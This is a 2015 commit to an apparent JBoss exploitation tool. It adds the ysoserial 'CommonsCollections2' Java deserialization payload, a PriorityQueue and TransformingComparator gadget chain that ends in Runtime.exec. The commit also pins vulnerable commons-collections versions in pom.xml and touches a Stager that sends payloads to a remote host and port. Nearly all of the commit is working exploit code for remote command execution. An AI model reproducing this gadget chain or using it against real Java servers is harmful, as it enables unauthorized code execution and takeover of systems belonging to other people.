Added support for CommonsCollections2 payload type

gnrlist · Nov 19, 2015 · 1f3b5be · 1f3b5be
1 parent 4eae753
commit 1f3b5be
Show file tree

Hide file tree

Showing 4 changed files with 66 additions and 5 deletions.
diff --git a/pom.xml b/pom.xml
@@ -29,9 +29,14 @@
             <version>0.9.9</version>
         </dependency>
         <dependency>
-            <groupId>org.apache.directory.studio</groupId>
-            <artifactId>org.apache.commons.collections</artifactId>
-            <version>3.2.1</version>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.0</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.1</version>
         </dependency>
         <dependency>
             <groupId>org.codehaus.groovy</groupId>

diff --git a/src/main/java/jbossexploit/Stager.java b/src/main/java/jbossexploit/Stager.java
@@ -15,7 +15,7 @@ public class Stager {
 
     public static void sendPayload(int stage, String rhost, int rport, String lhost, int srvport, String binaryName,
                                    String uripath, String payloadname) {
-        // TODO: Add support for the other vulnerable libraries, e.g. Groovy
+
         ysoserial.GeneratePayload ysoserial = new ysoserial.GeneratePayload();
         String command = null;
 

diff --git a/src/main/java/ysoserial/GeneratePayload.java b/src/main/java/ysoserial/GeneratePayload.java
@@ -4,7 +4,6 @@
 
 import org.reflections.Reflections;
 
-import java.io.ObjectOutputStream;
 import java.util.Collection;
 import java.util.Set;
 

diff --git a/src/main/java/ysoserial/payloads/CommonsCollections2.java b/src/main/java/ysoserial/payloads/CommonsCollections2.java
@@ -0,0 +1,57 @@
+package ysoserial.payloads;
+
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+
+/*
+	Gadget chain:
+		ObjectInputStream.readObject()
+			PriorityQueue.readObject()
+				...
+					TransformingComparator.compare()
+						InvokerTransformer.transform()
+							Method.invoke()
+								Runtime.exec()
+ */
+
+@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
+@Dependencies({"org.apache.commons:commons-collections4:4.0"})
+public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
+
+    public Queue<Object> getObject(final String command) throws Exception {
+        final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
+        // mock method name until armed
+        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+        // create queue with numbers and basic comparator
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
+        // stub data for replacement later
+        queue.add(1);
+        queue.add(1);
+
+        // switch method called by comparator
+        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+        // switch contents of queue
+        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+        queueArray[0] = templates;
+        queueArray[1] = 1;
+
+        return queue;
+    }
+
+    public static void main(final String[] args) throws Exception {
+        PayloadRunner.run(CommonsCollections2.class, args);
+    }
+
+}